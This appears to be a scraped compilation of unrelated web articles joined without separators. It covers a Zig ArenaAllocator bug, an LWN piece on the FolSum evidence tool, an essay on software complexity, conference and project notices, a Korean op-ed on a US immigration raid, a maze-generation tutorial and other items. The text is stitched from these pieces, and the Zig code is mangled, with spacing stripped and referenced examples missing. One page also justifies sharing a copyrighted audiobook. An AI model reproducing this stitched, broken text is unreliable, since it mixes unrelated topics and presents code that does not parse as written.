. This amused me since (a) I write a lot about dangling pointers (b) I write a bit about ArenaAllocators and (c) it isn't the first time I've messed this up.
Overview
If we go back to basics, in
Zig dangling pointers and segfaults
we started off with an easy-to-understad demonstration of a dangling pointer which boiled down to this function:
bufPrint
writes the formatted string into
buf
and returns a slice into
buf
containing the formatted string (or an error if
buf
isn't big enough). It might help if we imagine that
bufPrint
returns the length of the formatted string and adjust our code accordingly:
fnpowerLevel(over:i32)![]u8{var buf:[20]u8=undefined;// If bufPrint returned the length of the formatted string// rather than a slice of bufconst n =try std.fmt.bufPrint(&buf,"over {d}!!!",.{over});return buf[0..n];}
Now if you're new to Zig, you might be surprised to find out that, while the above is invalid, this is completely fine:
In Zig, assignments, including return values, are always copies. In the above two examples, and in the actual bug that we'll cover shortly, it all comes down to understanding what it is we are copying. In the first case, we're returning a slice and in the second case, an array. A slice is a length and pointer to an an array. It's that level of indirection that causes the issue. When you return the slice, you're returning a copy of the length (which is fine) and the pointer. That pointer is an address, but, in
powerLevel
it's an address which stops being valid when the function returns.
With the array, there is no indirection. We're not returning an address of the array, we're returning the array itself. If we changed the function return type to
[]u8
and then did
return &bin;
, we'd be in trouble again, as now we'd be returning an address which will become invalid.
What does all this have to do with ArenaAllocators?
ArenaAllocator
The issue found in pg.zig can be simulated by a trivial example:
Our
User
has a
name
and, reasonably, in
init
we clone the name to ensure that it lives for as long as the
user
(otherwise, the caller would need to make sure the
name
passed into
init
is valid for as long as the returned
user
). It's a bit premature, but we create an arena to manage any allocations associated with the
user
. This makes our
user.deinit
method simple: clear the arena.
Unfortunately, even if
user.deinit()
is called, this code has a memory leak. If we take the above struct and try to use it in a program, we'll be told that
user.name
is leaking despite
arena.deinint
being called:
Can you tell what's going on? Here's a hint, if we make a small change to our
User.init
, the leak goes away:
fninit(allocator:Allocator, name:[]constu8)!User{var arena = ArenaAllocator.init(allocator);return.{// the order has been swapped.name =try arena.allocator().dupe(u8, name),.arena = arena,};}
I think this is the type of bug that some people will see right away and consider obvious. But for me, even looking at this code, specifically designed around the issue, I find it subtle. Why is one version right and the other one wrong? To answer that, we need to understand what an
ArenaAllocator
is
(not how it works).
std.heap.ArenaAllocator
is a structure with two fields:
What Zig calls the "child_allocator", I would call the "parent_allocator", but either way, this is the allocator passed into
init
. The structure could be simplified by directly storing the state:
The main takeway is that we can "promote" our
ArenaAllocator.State
back into an
ArenaAllocator
by providing the same
allocator
passed to
init
. This should make some sense. We saw that an
ArenaAllocator
is two fields:
allocator
and
state
. Our user stores the
state
and can turn that back into a full
ArenaAllocator
by providing the missing part: the
allocator
. What does this achieve? It makes our
User
struct smaller because it [indirectly] has 1 less field, the
child_allocator
. If you had thousands of ArenaAllocators, that could add up.
None of that tells us why this leaks:
var arena = std.heap.ArenaAllocator.init(allocator);return.{.arena = arena,.name =try arena.allocator().dupe(u8, name),};
The answer is: assignments are copies. When we assign the
arena
variable to our
arena
field, via
.arena = arena
, we're making a copy of our
ArenaAllocator
. At that point, it is correct to say we have two
ArenaAllocators
. One is the
arena
local variable and one belongs to the returned value. With this perspective, which arena do we
dupe
from and which do we
deinit
?
If we go back to our program and print
user.arena.state.buffer_list.first
, it'll print
null
. In short, we're duping from one arena and freeing from another. Now we can understand why re-ordering the field assignment fixes the issue.
var arena = ArenaAllocator.init(allocator);return.{.name =try arena.allocator().dupe(u8, name),.arena = arena,};
In this version, the copy that we're making happens after the allocation. There are still 2 arenas, but the mutation happens before the copy and thus the copy includes a copy of
state
which knows about the allocation made with
dupe
.
Solution
In some cases, re-arranging the code as we did, might be suitable. But this would only work for simple cases as it doesn't seem like a particularly robust solution. It's very easy to mess up. It's tempting to think that instead of copying the
arena
, we could just get its address:
constUser=struct{
name:[]constu8,
arena:*ArenaAllocator,// changed to a pointerfninit(allocator:Allocator, name:[]constu8)!User{var arena = ArenaAllocator.init(allocator);return.{.arena =&arena,// changed to take the address.name =try arena.allocator().dupe(u8, name),};}// ...};
It's true that now we only have 1 arena, because our field assignment is copying an address. But we've introduced a dangling pointer since the address that we're copying lives on the stack which will become invalid when we return.
This is a common problem, and not just with
ArenaAllocators
. We want to reference something and we need that something to outlive the current stack. That wasn't phrased as a question, but the answer is
put it on the heap
:
We've actually introduced another memory leak, but we're progressing, our original issue is fixed.
allocator.create
return a
*ArenaAllocator
(a pointer to an
ArenaAllocator
). When we assign
.arena = arena
, we're still making a copy, but rather than making a copy of the
ArenaAllocator
and its
state
field, we're creating copy of the address. A copy of an address is still pointing to the same initial instance. Furthermore, our
ArenaAllocator
no longer lives on the function stack, it lives on the heap. Its outlives the function call.
However, our code is now making a new allocation. Before, we were only allocating a duplicate of
name
. Now we're also allocating an
ArenaAllocator
which we never free. That's our new leak. We need to change
user.deinit
:
The example we used ended up creating a memory leak, but you could get different results, including segfaults. The exact behavior is hard to reason about. In the case of pg.zig, multiple allocations were being made, across copies of the same
ArenaAllocator
, reallocations were happening, and the "child allocator" had its own complexity. The result was a bus error - something you don't see often.
The issue isn't specific to
ArenaAllocator
, but from my own experience and help channels, I know others have had the same problem. Maybe that's because
ArenaAllocators
are frequently used. For me, it highlights the need to be mindful of assignments. You need to know what's being copied and how the original and new copy are being used after the assignment takes place. Part of the subtlety comes from how simple this example is. The
return
statement both creates a copy and then mutates the original.
I somehow find this issue obvious in hindsight but also very subtle.
Fighting human trafficking with self-contained applications
Brooke Deuson is the developer behind
Trafficking Free Tomorrow
, a nonprofit organization that
produces free software to help law enforcement combat human trafficking. She is
a survivor of human trafficking herself.
She spoke at RustConf 2025 about her
mission, and why she chose to write her anti-trafficking software in Rust.
Interestingly, it has nothing to do with Rust's lifetime-analysis-based memory-safety —
instead, her choice was motivated by the difficulty she faces getting police
departments to actually use her software. The fact that Rust is statically
linked and capable of cross compilation by default makes deploying Rust software
in those environments easier.
She started by pointing out that no software is going to be able to
single-handedly put an end to human trafficking. Her goal for the programs
Trafficking Free Tomorrow makes is to "
raise the cost of selling people
"
to make human trafficking not economically viable. She does this by building
tools for law enforcement, who are often already trying to stop human trafficking.
The problem is that trafficking is profitable, which means that the criminals
who engage in it often have well-funded defenses and expensive lawyers. If there
is any way for the defense to get evidence thrown out, they'll find it and do
so. Before something becomes evidence in a court of law, it starts out as
"
stuff from a crime scene
". In order to be usable as
evidence, it needs to be tracked and signed-off-on at every step along the way,
in order to prove that it couldn't have been tampered with.
Deuson described
FolSum
(the web site for which is offline at the time of writing, although Deuson is
working on it), which is an MIT-licensed application that helps
maintain this chain of custody for digital evidence. It records hashes of
folders of digital evidence, and produces a report about what has and
hasn't changed since the last run of the tool. This can be used to help prove
the chain of custody in court.
This idea isn't recent; Deuson has been working on it for several years, ever
since she had
"
a bad experience in college
". Surviving that experience
her "
really angry
" and motivated her to start working with law
enforcement to try to ensure it couldn't happen again.
She initially wrote simple Python scripts to
help with chain-of-custody problems. Those scripts worked on her machine, but she had
trouble delivering the software to the people who actually need it.
The users Deuson targets are largely underfunded police departments that can't
afford expensive commercial forensic solutions. The people there are usually
non-technical and more used to working with paper forms for evidence tracking.
They need software that is simple, self-explanatory, and capable of running in a
highly locked-down enterprise environment. Deuson's first attempt at
distributing her software was to bundle it using Kubernetes. That sort of
worked, but it turned out to be hard to get it installed in police departments.
Opening ports in the firewall is also often prohibitively hard.
"
Getting software into these environments is really difficult.
"
Like what you are reading?
Try LWN for free
for 1 month,
no credit card required.
Eventually, she decided that the only way to make this work would be to write a
single, standalone executable that does everything locally. It would need to be
able to run on ancient desktop computers, in a variety of environments,
without external dependencies. That's why she ultimately chose Rust to write FolSum.
Rust is probably most famous for its approach to memory safety, but she said
that those weren't actually too relevant to her choice. It is important that
Rust is a memory-safe language, though. Not because of the reliability of the
software, but because it lets her point at things like the Biden
administration's
report on modern computer security
or CISA's
recommendations
for secure software
in order to justify her choice to non-technical lawyers.
Being able to point at an official report that says a certain language is an
approved way producing secure software is actually quite helpful for getting
FolSum adopted.
The main reason she chose Rust, though, was developer ergonomics. "
I'm just
one person
", she explained. Nobody else is currently working at Trafficking
Free Tomorrow. So if she wants to produce this software, it needs to be in a
language that makes it easy to meet her requirements for producing
self-contained applications.
Ultimately, she's happy that she chose to experiment with Rust. Writing a local
application instead of a server-based one let her keep things simple.
One thing that users really liked about the Rust version of the application was
that it starts quickly, she said. Lots of commercial software is
big and bulky, and takes a while to start up, leaving users staring at splash
screens. FolSum starts up almost as soon as
the user releases the mouse button. That's important, because it builds user
trust in the reliability of the application from the beginning, she said.
One of Rust's features is "fearless concurrency" — standard library APIs that
make it impossible to construct data races in safe Rust code. When Deuson
started writing FolSum, she didn't know anything about that. "
Starting off, I
didn't really know anything about concurrency. I didn't have formal training.
"
So the first version of the program appeased Rust's concurrency model by using a
single big mutex wrapped around a shared hash map.
That did work, but it led to a lot of difficult-to-debug deadlocks, "
which
sucks
". Ultimately, she ended up rewriting the implementation to use
channels, which results in fewer deadlocks. Notably, FolSum doesn't use any
asynchronous code yet — it's all done with synchronous I/O, and the GUI actually
runs in the same thread as the checksumming work.
The GUI is written using
egui
, which is an immediate-mode GUI framework, meaning
that the interface is completely redrawn on every frame. Deuson called the
approach "
slightly cursed, but easy to reason about
". The interface is
basic, with no frills or animations — it's just a single window with some text
and four buttons.
Deuson wrote it that way as a simple prototype, just to get something working.
"
I didn't think that UI would be nice, but the users actually really liked
it.
" Now, she doesn't plan to change the interface. It turns out that
non-technical users like the approach that she has called "
GUI as
docs
", where the application puts the explanation of what it does right next
to the individual buttons that do those things. Several users have told her that
they wished other software was written like this, to her bafflement. For-profit
software is often a forest of features, which makes it hard to find the specific
thing one needs, especially if the tool is only rarely used, she said.
Some Rust features that she did really appreciate were the integrated unit
tests and benchmarking libraries. They let her focus on what she felt was
important, rather than spending time on boilerplate. On the other hand, she felt
that people should probably avoid advanced language features and extra
dependencies. She's written FolSum with basic for loops and plain imperative
code, and it works well for her.
In the future, she would like to add a few carefully chosen new features to
FolSum, including a progress bar and code to avoid overwhelming cheap
network-attached storage. She also wants to add a crash reporter that gives
users a report that they can send to her when something goes wrong.
Ultimately, FolSum is a pretty small piece of software. Building it helped her
iron out the web-site, continuous-integration, software-packaging, and
distribution problems; now that she knows what works, future software from
Trafficking Free Tomorrow is on a much firmer foundation.
There was only time for a few questions at the end of the session; one person
asked how she had dealt with the social problems of getting police departments
to adopt her software. Deuson explained that when talking to stakeholders, she
mostly didn't try to convince them of anything technical — instead, she tries to
think about who their bosses are, and who assumes the risk from choosing to use
FolSum. That's where resources like the White House recommendations are really
useful to convince users that it is actually a reasonable way to do things.
I asked what other anti-human-trafficking software she wanted to write in the
future. Deuson responded that she had planned on "
tons of stuff
"
including dedicated
perceptual hashes
for images, tools for working with
recursively zipped files, a way to organize timelines of conversations, and
open-source intelligence
tools.
The goal Deuson has set for herself, of making human trafficking economically
unfeasible, is important but daunting; hopefully, her strategy of producing small,
dependable tools for the most under-resourced law-enforcement agencies will help
achieve it.
The Great Pyramids took decades to build. It was a monumental feat of human
ingenuity and collaboration. Today, we software developers erect our own
pyramids each day - not from stone, but from code. Yet despite far more advanced
tools, these systems don’t always make the experience better. So why, when KISS
(Keep It Simple, Stupid) is a well-known mantra, do we keep gravitating toward
complexity?
Marketing > Simplicity
Sell me this pen: ✎
What? You don’t know how? Okay, instead, sell me this
Penzilla
- a pen that
can erase, write in different colors, play music, dial 911, act as a radio
antenna, and even help you cheat on your homework.
In the software world, how would you sell a competitor to the
cat
command?
Sounds insane, right? It’s so simple - why would anyone compete with it, let
alone build an alternative? (Let’s pretend Rust coreutils don’t exist.)
But what if instead of a
cat
competitor, it was
catzilla
- a tool that could
watch your files, hop through portals, and jump across networks? Now that’s
marketable! Still, nobody would take you seriously. Why? Because
cat
just
works, and it’s highly unlikely anyone will ever need anything else (just like
Penzilla).
However, if
catzilla
were hyped from every corner of the internet, with a
CatConf coming next month, you’d at least be curious to try it. Social proof
makes you take it seriously. Even if it’s just a gimmick, it’s still a gimmick
with users.
Complexity also signals effort, expertise, and exclusivity. If you struggle to
understand it, your brain rewards you with awe: “Wow, this must be really
smart,” you think - even if a simpler solution would work just as well.
Marketers, engineers, and startups all exploit this trick. The more layers, the
fancier the terminology, the more “premium” it feels. Complexity turns into a
status symbol rather than a necessity.
What is inside the Great Pyramids?
Whatever you put inside, duh. Like the Pyramids, modern software is built layer
upon layer - dependencies, frameworks, and abstractions stacked high. But just
as the Pyramids’ inner chambers are often empty, these layers can hide a lack of
substance, making maintenance a nightmare.
When you look at a Pyramid, only a moment later you notice your mouth is open
wide in awe (close it now). Simplicity, on the other hand, doesn’t hold any
secrets inside. It’s invisible until you realize it’s genius.
Complexity shouts, “Look at me!”, while simplicity whispers “Did you notice?”.
One thing for sure, though, simplicity often wins in the long run. After the
initial amazement is gone, it’s the function that quietly does the job that most
people need.
React piles concepts into your mental backpack: rendering models, hooks, state
libraries, routing, and a build pipeline. Say no to it, and suddenly you’re the
“neckbeard stuck in the ’90s,” outside the cool-kids club.
The simple alternative is just around the corner: sprinkle vanilla JavaScript
where it’s needed and don’t build your identity around a framework. That mindset
is hard to swallow, though (especially when companies have spent millions
convincing developers their stack is the only way forward).
Beyond marketing: why we embrace complexity
While marketing glorifies and normalizes complexity, several deeper, more innate
forces draw us developers toward it:
The creative temptation:
We are problem-solvers by nature. Building a
complex, intricate system is a rewarding intellectual challenge, akin to
solving a magnificent puzzle. The temptation to over-engineer is a powerful
siren song when we’re flexing our creative muscles.
Legacy systems and technical debt:
Many projects inherit convoluted
codebases. Adding new features often means piling on more complexity rather
than simplifying, as time and budget constraints prioritize quick fixes over
elegant, simple solutions.
Team dynamics and collaboration:
In large teams, developers add layers of
abstraction to make code “future-proof” or accommodate diverse requirements.
This can lead to over-engineered solutions as each contributor adds their own
signature, creating a complex whole that no single person fully understands.
Pressure to innovate:
In a competitive tech landscape, there’s a constant
pressure to differentiate. Novelty and innovation are often expressed through
new features and intricate designs, making complexity an easy, if not always
effective, way to stand out.
Build pyramids with purpose
Build pyramids if you must, but build them like the Egyptians did: with a clear
purpose, a solid foundation, and chambers that actually contain something of
value - not just hollow, maze-like passages that future archaeologists (or the
poor soul maintaining your code in two years) will curse.
So next time you find yourself coding a 500-line abstraction for something that
could be copy-pasted a few times and done in 50 lines, ask yourself: are you
solving a real problem for the users and maintainers… or just indulging in
intellectual masturbation?
Linux Plumbers Conference registration open
Linux Weekly News
lwn.net
2025-09-15 23:18:35
Registration for the 2025 Linux Plumbers Conference (Tokyo,
December 11 to 13) is
now open. LPC tickets often sell out quickly, so it would be best not
to delay if you intend to attend....
Registration for the 2025 Linux Plumbers Conference (Tokyo,
December 11 to 13)
is
now open
. LPC tickets often sell out quickly, so it would be best not
to delay if you intend to attend.
Massive Attack Turns Concert into Facial Recognition Surveillance Experiment
Bristol band uses live facial recognition on concertgoers to create uncomfortable art about surveillance culture
Imagine you’re vibing to “Teardrop” when suddenly your face appears on the massive LED screen behind the band. Not as a fun crowd shot—as processed data in
Massive Attack’s
real-time
facial recognition
system. Welcome to the most uncomfortable concert experience of
2025
.
When Your Face Becomes the Show
The band deployed live facial recognition technology that captured and analyzed attendees during their recent performance.
During their latest tour stop, Massive Attack shocked fans by integrating
facial recognition
into the show itself. Live video feeds captured audience faces, processing them through recognition software and projecting the results as part of the visual experience. This wasn’t subtle venue security—your biometric data became part of the artistic statement, whether you consented or not.
Social media erupted with bewildered reactions from attendees. Some praised the band for forcing a conversation about surveillance that most people avoid, while others expressed discomfort with the unexpected data capture. The split reactions confirmed the band’s provocative intent had landed exactly as designed.
Art Meets Digital Resistance
This stunt aligns with the band’s decades-long critique of surveillance culture and digital control systems.
This provocation fits Massive Attack’s DNA perfectly. The Bristol collective has spent years weaving
political commentary
into their performances, particularly around themes of
surveillance
and control. Their collaboration with filmmaker
Adam Curtis
and consistent engagement with privacy issues positioned them as natural provocateurs for this moment.
Unlike typical concert technology that enhances your experience, this facial recognition system explicitly confronted attendees with the reality of
data capture
. The band made visible what usually happens invisibly—your face being recorded, analyzed, and potentially stored by systems you never explicitly agreed to interact with.
The Consent Question Nobody Asked
Details about data storage and participant consent remain unclear, adding to both artistic ambiguity and ethical concerns.
Here’s where things get murky. Massive Attack hasn’t released official details about what happened to the captured biometric data or whether
permanent records
were kept. This opacity intensifies the artistic statement while raising legitimate
privacy
questions about conducting surveillance to critique surveillance.
The audience split predictably along ideological lines. Privacy advocates called it a boundary violation disguised as art. Others viewed it as necessary shock therapy for our sleepwalking acceptance of facial recognition in everyday spaces. Both reactions prove the intervention achieved its disruptive goal.
Your relationship with facial recognition technology just got more complicated. Every venue, every event, every public space potentially captures your likeness. Massive Attack simply made the invisible visible—and deeply uncomfortable. The question now isn’t whether this was art or privacy violation, but whether you’re ready to confront how normalized surveillance has become in your daily life.
Show HN: Pooshit – sync local code to remote Docker containers
I'm a lazy developer for the most part, so this is for people like me. Sometimes I just want my local code running in live remote containers quickly, without building images and syncing to cloud docker repos or setting up git workflows or any of the other draining ways to get your code running remotely.
With pooshit (and a simple config file), you can simply push your local dev files to a remote folder on a VM then automatically remove relevant running containers, then build and run an updated container with one command line call.
It works well with reverse proxies like nginx or caddy as you can specify the docker run arguments in the pooshit_config files.
The author
Ray Bradbury
is
one of the early science fiction authors that moved science fiction
into a literary form. As a writer Bradbury constructs beautifully
written stories and novels. Bradbury's writing is in stark contrast
to Bradbury as a speaker. The first time I heard Ray Bradbury speak
was at the Association for Computing Machinery (ACM) yearly conference
in Los Angeles in the 1980s. Hearing Bradbury speak is an almost
painful experience. The pictures that Bradbury can paint with the
written word seem to be entirely missing when Bradbury speaks. He is
halting, awkward and does not seem to know where he wants to go
in his talk.
In contrast to Bradbury, listenting to William Gibson has the feel of
his written work. The same complex world view and sentence structure
is there, although not as finely edited. An example of this can be
found in the documentary made about William Gibson,
No Maps for these Territories
.
This documentary includes extensive interviews with William Gibson.
No Maps
also provides a glimpse of the way Gibson looks at the
interconnections and relationships in the world around us. This view
of Gibson's mind shows us his genius.
The mirror between William Gibson's spoken voice and his written voice
gives special force to his readings of his work. Early in his career
Gibson did an abridged reading of
Neuromancer
, his first novel
and the work that made him famous. It was in this novel that Gibson
coined the term
cyberspace
. This reading was only published on
audio-tape and is now out of print.
I hate the idea that Gibson's wonderful reading of
Neuromancer
should be lost or inaccessable. I was only able to hear it because
the Mountain View (California) Library had a copy. Fortunately I've
been able to find an MP3 copy of these audio tapes. They can be
downloaded below.
I am only providing these MP3s because the original has been out of
print for years. As a software engineer I believe that I should be
paid for my work. If I hold this view then it is only reasonable that
I should also believe that artist should be paid for their work. All
of the software and music I own I have paid for (or is open source).
I would prefer that the publisher re-issue the audio-tape of William
Gibson's reading in a more modern format (perhaps CD) and that William
Gibson collect royalties on this work. Gibson's reading has been out
of print so long that I can only assume that this is unlikely to
happen.
If you're a fan of William Gibson I hope that others will mirror these
files as well so that they will never be lost.
This reading was published on four magnetic tape audio cassetts.
These have been re-recorded in MP3 format:
Neuromancer is one of the few books that I've read many times. All of
Gibson's books are good (well, except for
The Difference
Engine
, but that's Bruce Sterling's fault).
Neuromancer
is
still in print, so you should go out an buy a copy if you want to read
it. Writers pay their bills from the royalties from book sales. I've
included the link above in case you want to get a feel for the book
before you buy it (even paperback books are not cheap these days).
A worker at a Hyundai-LG battery plant in Georgia is shackled by US authorities after an immigration raid on Sept. 4, 2025. US Immigration and Customs Enforcement later released video footage of the raid. (Yonhap)
By Park Hyun, editorial writer
While many would have you believe that the fiasco involving over 300 Korean workers being arrested and detained by US immigration authorities has been resolved by allowing the workers to “voluntarily depart” back to Korea, this is far from the truth. Korea as a nation was deeply shocked to witness our workers, who had traveled to the US to work at the request of American investors, shackled at their hands and feet with chains. This barbaric incident will leave a lasting stain on Korea-US relations.
The mass arrests are undoubtedly a wake-up call, a major rupture that opens our eyes to what is happening in the US at this moment. We must heed this warning to close the loopholes and traps in our investment projects with the US. Otherwise, we may eventually face even greater calamity.
To understand what’s at the core of this situation, we must revisit the “Make America Great Again” movement championed by US President Donald Trump. MAGA represents a reactionary movement by white evangelical forces seeking to revert America to a time before the civil rights movement in the 1960s. Its core supporters are low-income, poorly educated white Americans and evangelical Protestants. Trump has become a voice amplifying the anxieties of these groups, whose societal status has been shaken by job losses due to globalization, deepening economic polarization, and a surge in immigration. Trump has incited them to channel their anger toward the established elite and “outsiders,” such as people of color, undocumented immigrants, and Muslims.
Trump is fundamentally a populist and white supremacist. His slogan of “Make America Great Again” would be phrased more accurately as “Make White America Great Again.” His insistence on imposing a 50% tariff specifically on steel and aluminum stems from the fact that white, Protestant populations are concentrated in the American Rust Belt.
The massive crackdown on allegedly undocumented immigrants at the Hyundai-LG Energy Solution plant in Georgia must also be understood within this context. The sight of our workers being led out in chains resembles images of African slaves in the 18th and 19th centuries being dragged out by their owners. The Department of Homeland Security boasted that the raid was “the largest single-site enforcement operation in [its] history,” and Immigration and Customs Enforcement even brazenly released footage of the operation — which clearly risks human rights violations — as if to flaunt these arrests as their achievement.
Far-right white Americans may have rejoiced inwardly at this incident. Even politicians like the governor of Georgia and local lawmakers, who had previously been enthusiastic about hosting the factory, have abruptly changed their stance and joined the chorus of discontent. This shift is likely because it’s difficult to ignore the anti-immigrant sentiment among Americans born into citizenship. The US is in the grip of an irrational frenzy, reminiscent of the McCarthyism that swept through American society in the 1950s. The US could have resolved this visa issue diplomatically by giving Korea advance notice as an ally. Yet, the crackdown — complete with helicopters and armored vehicles, as if to gleefully flaunt their power — can only be explained as a political performance.
The Trump administration’s plan to revive manufacturing in America is a strategy deeply influenced by political calculations rather than economic logic. Having stoked the discontent of the white working class in the Rust Belt to win his presidency, Trump has a strong motive to continue exploiting them politically. While he, as a political leader, may attempt to pursue such policies, these efforts amount to little more than wishful thinking. Historically, such attempts have rarely succeeded. If they had, why did the British Empire, once called a territory where the sun never sets, crumble over time?
Declining industries inevitably relocate to emerging nations over time. Even in Korea, we face difficulties in reviving such industries. How much more challenging would it be for the US, where production costs are at least 30% higher than ours, and over two decades of hollowing-out in manufacturing have collapsed the industrial ecosystem? Trump is dreaming a delusional fantasy of using imperial might to forcibly mobilize allies and reverse this trend. To make matters worse, treating allied workers who are trying their best to assist in realizing this pipe dream as if they are slaves of a vassal state will jeopardize even those projects that had some potential. We’re currently watching the US foolishly shoot itself in the foot.
This incident should prompt us in Korea to comprehensively reassess our investment projects in the US. We agreed to a tariff deal during a transitional period when President Lee Jae Myung had just taken office. Trump’s aggressive tactics forced us to follow Japan’s lead, but we must now take a cold, hard look at the specifics of what we agreed to. The US made outrageous demands on Japan: execute US$550 billion in investments within Trump’s term, provide funds within 45 days if Trump orders it, and hand over 50%-90% of profits to the US. Reports say the US is now making identical demands of us.
Following the footsteps of Japan, the world’s third-largest economy and a quasi-reserve currency nation, could poison our own economy. Rather than yielding to America’s unreasonable demands to avert an immediate crisis, the government must clearly distinguish what we can and cannot do and negotiate with the US. We must bear in mind that even if the manufacturing revival fails, the US, as the world’s largest economy and reserve currency holder, will likely suffer little harm. Our economy, on the other hand, could be severely shaken by a major shock.
I thought I had an verbal agreement with them, that “Varnish Cache” was the FOSS project and “Varnish Software” was the commercial entitity, but the current position of Varnish Software’s IP-lawyers is that nobody can use “Varnish Cache” in any context, without their explicit permission. [...]
We ha...
I thought I had an verbal agreement with them, that “Varnish Cache” was the FOSS project and “Varnish Software” was the commercial entitity, but the current position of Varnish Software’s IP-lawyers is that nobody can use “Varnish Cache” in any context, without their explicit permission. [...]
We have tried to negotiatiate with Varnish Software for many months about this issue, but their IP-Lawyers still insist that Varnish Software owns the Varnish Cache name, and at most we have being offered a strictly limited, subject to their veto, permission for the FOSS project to use the “Varnish Cache” name.
We cannot live with that: We are independent FOSS project with our own name.
So we will change the name of the project.
The new association and the new project will be named “The Vinyl Cache Project”, and this release 8.0.0, will be the last under the “Varnish Cache” name.
I've been reading about mazes and how to generate them. The type of mazes I'll be talking about are 2D grids of connected cells. They're
perfect mazes
(i.e. there is exactly one unique path between any two cells aka a uniform spanning tree).
I'll refer to the connections between cells as
edges
. An edge can be created between a cell and any of its neighbors (up, right, left, down). When two cells don't share an edge, there is a wall between them. While generating a maze, if a cell isn't reachable, I'll render it dark.
Left: user-facing maze view. Right: debug view.
A maze begins as a grid of unconnected cells. All dark. When we start connecting the cells, we create the maze.
The above visual was created with the following code.
const maze =newMaze(2,2);
constA= maze.getCell(0,0)
constB= maze.getCell(1,0)
constC= maze.getCell(1,1)
constD= maze.getCell(0,1)
With our new maze, we can start carving edges between the four cells.
A.carveEdge(B)
B.carveEdge(C)
C.carveEdge(D)
Finally, we can pick the two points furthest from each other for the start and end positions. In this case, we pick
A
and
D
. Later, I'll explain how to find the two furthest points in any maze.
maze.start =A
maze.end =D
Aldous Broder
To automate our maze creation process, we can reach for one of the many
maze generation algorithms
. To start, I've chosen Aldous Broder because it's the easiest to code. It uses a random walk-based method to visit every cell, and it's likely the most frustrating to watch.
Though inefficient (it revisits cells already part of the maze during generation), it creates an unbiased maze. This means that every possible maze of a given size is equally likely to be generated.
You may be able to reverse engineer the algorithm by simply watching the maze generation. To define it very simply: walk around and connect unconnected cells.
const visited =newSet<Cell>();
// Choose a random starting cell
let current =randomMember(maze.cells.flat());
visited.add(current);
// While there are unvisited cells
while(visited.size < maze.width * maze.height){
// From the current cell, choose a random neighbour
const next =shuffle(current.neighbors)[0];
// If the neighbour has not been visited yet
if(!visited.has(next)){
// Add an edge and mark as visited
current.carveEdge(next);
visited.add(next);
}
// Move to this neighbour whether or not it was visited
current = next;
}
Random Depth-First Search
If we don't like the inefficiency of Aldous Broder, we can use Random Depth-First Search (DFS) to visit each cell once. By stepping from a cell to a random unvisited neighbor, we can traverse the tree.
You may recall that I described Aldous Broder as unbiased. Unfortunately, Random DFS tends to create long corridors due to the path's tendency to stick to one direction. Perhaps that's acceptable for your use case.
I've chosen the recursive version of this algorithm because I personally find it easier to follow.
const visited =newSet<Cell>();
// Visit a cell and carve a path to the next cell
asyncfunctionvisit(last: Cell, next: Cell){
// If the cell has already been visited, skip
if(visited.has(next)){
return;
}
// Otherwise, mark the cell as visited
visited.add(next);
// Carve a path between the last cell and the next cell
last.carveEdge(next);
// Get the neighboring cells of the next cell that haven't been carved yet
const neighbors =shuffle(next.uncarvedEdges());
// Recursively visit each neighbor
for(const neighbor of neighbors){
awaitvisit(next, neighbor);
}
}
// Start the maze generation by visiting a random neighbor of a random cell
If Aldous Broder is inefficient, and Random DFS has a long-corridor bias, then we can choose something in between. Wilson's Algorithm is unbiased like Aldous Broder, but it doesn't revisit connected cells.
Wilson's Algorithm performs a
loop erased random walk
. The core loop is this: it starts at an unvisted random cell and randomly walks until it reaches the maze. If, during the walk, a loop is created, then that section of the loop is erased. The initial walk has to reach a random cell.
It tends to start slowly and ramp up.
A little more code is required for this one.
const unvisited =newSet<Cell>(maze.cells.flat());
const visited =newSet<Cell>();
// Choose one cell arbitrarily, add it to the maze, and mark it as visited
const startCell =randomMember(maze.cells.flat())
visited.add(startCell);
unvisited.delete(startCell);
// Continue until all cells have been visited
while(unvisited.size >0){
let path =[];
let current =randomMember(unvisited);
// Perform a random walk until reaching a cell already in the maze
while(!visited.has(current)){
path.push(current);
let next =randomMember(current.uncarvedEdges());
// If a loop is formed, erase that section of the path
const loopIndex = path.indexOf(next);
if(loopIndex !==-1){
path = path.slice(0, loopIndex +1);
}else{
path.push(next);
}
current = next;
}
// Add the path to the maze by carving edges and marking cells as visited
for(let i =0; i < path.length -1; i++){
const cell = path[i];
const nextCell = path[i +1];
cell.carveEdge(nextCell);
visited.add(cell);
unvisited.delete(cell);
}
}
I've read in a few places that Wilson's Algorithm is faster than Aldous Broder at generating mazes; I've found this to be true in my brief tests. However, I haven't found this to be proven with any rigor. I also
read
that starting with Aldous Broder and then switching to Wilson's Algorithm (reasoning: Aldous Broder is slow at the end, Wilson's Algorithm is slow at the start) is faster than either. However, I haven't seen proof that this combination still results in a uniform spanning tree (where all possible mazes have equal probability).
Finding The Two Furthest Points
You may have noticed in these visualizations that the start and end positions (
S
and
E
) are added once the maze is complete. Usually, start and end positions are placed by the author of a handcrafted maze. They have meaning. For the mazes I’ve been generating, I simply pick the two furthest points.
The strategy for finding the two furthest points involves running two breadth-first searches while tracking the distance from the root cell in each search.
Choose a random starting cell
A
BFS with
A
as root
Mark the furthest point from
A
as
B
BFS with
B
as root
Mark the furthest point from
B
as
C
The two furthest points are
B
and
C
The start and end positions are then chosen randomly from these two points.
Finding the start and end cells via tree diameter.
I suspect there is a way to figure out the start and end positions while also generating a maze. Perhaps not for all of the algorithms we covered. It
feels
possible.
As for resources, I found most of my jumping off points on the Wikipedia page
Maze generation algorithm
. Searching for maze algorithms usually turns up academic resources (with mixed levels of accessibility).
The code for all the visuals and algorithms can be found in the source of this website, specifically in the
mazes directory
. The mazes are rendered with
<canvas>
elements.
Ghost Kitchens Are Dying. Here's the $15 Billion Lesson Every Restaurateur Must Learn.
A ghost kitchen stripped away everything you think makes a restaurant a restaurant. No dining room. No servers. No storefront. No customers walking through the door. Just a kitchen. Four walls. Commercial equipment. And a phone that never stops ringing with delivery orders.
Ghost kitchens exist only in the digital world. Customers find them on DoorDash, Uber Eats, and Grubhub. They order through an app. Food gets cooked in a shared commercial space. A driver picks it up. 30 minutes later, it shows up at your door in a paper bag.
The kitchen itself operates like a factory assembly line. One space prepares food for multiple virtual restaurant brands³. The same cook making your "authentic" Italian pasta also flips burgers for a completely different brand name. Then switches to preparing tacos for a third virtual restaurant. All from the same kitchen. All with different logos on the delivery apps.
These facilities rent space in industrial areas where the rent costs less. No need for prime real estate. No foot traffic required. No parking spaces. No bathroom maintenance. No dining room cleaning.
The promise sounded perfect. Lower costs. Higher profits. Multiple revenue streams from one location.
